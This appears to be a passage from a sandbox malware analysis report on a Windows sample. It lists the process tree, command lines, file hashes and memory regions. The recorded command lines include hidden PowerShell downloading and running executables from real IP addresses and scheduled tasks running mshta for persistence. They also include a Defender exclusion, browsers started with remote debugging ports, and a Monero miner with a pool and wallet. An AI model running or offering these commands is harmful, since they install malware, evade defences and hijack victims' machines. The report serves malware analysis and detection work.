PID 5048 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1088 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1028 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1028 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1028 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1028 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3420 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1028 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2184 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2184 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1028 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1028 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1028 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4972 wrote to memory of 2760 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 2760 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 2760 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe

"C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 7t65Omafmt1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 7t65Omafmt1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "a3WAkmatu4N" /tr "mshta \"C:\Temp\5Aqb7QJ60.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\5Aqb7QJ60.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE

"C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE"

C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5032 -ip 5032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 788

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\bxagwdt\nharnrr.exe

C:\ProgramData\bxagwdt\nharnrr.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4988 -ip 4988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 800

C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14F5.tmp\14F6.tmp\14F7.bat C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe988fcc40,0x7ffe988fcc4c,0x7ffe988fcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2356 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3100 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4612 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4532,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4420 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe

"C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4968,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xmXCfoJJ\Anubis.exe""

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4684 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5244,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5256 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5364,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5536 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe989046f8,0x7ffe98904708,0x7ffe98904718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4460 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe

"C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5724 -ip 5724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 800

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oyjnxywn\oyjnxywn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0B4.tmp" "c:\Users\Admin\AppData\Local\Temp\oyjnxywn\CSC3B73577943D247079958FCB5A253184C.TMP"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe

"C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\hd26p" & exit

C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe

"C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Network

Files


C:\Users\Admin\AppData\Local\Temp\14F5.tmp\14F6.tmp\14F7.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

memory/4644-455-0x00000234F7A50000-0x00000234F7A72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/1640-462-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1640-464-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1088-465-0x0000000000900000-0x0000000000DBC000-memory.dmp

memory/876-466-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/4052-487-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-488-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-493-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-494-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-497-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-501-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\hd26p\kxb1dtj58

MD5 a182561a527f929489bf4b8f74f65cd7
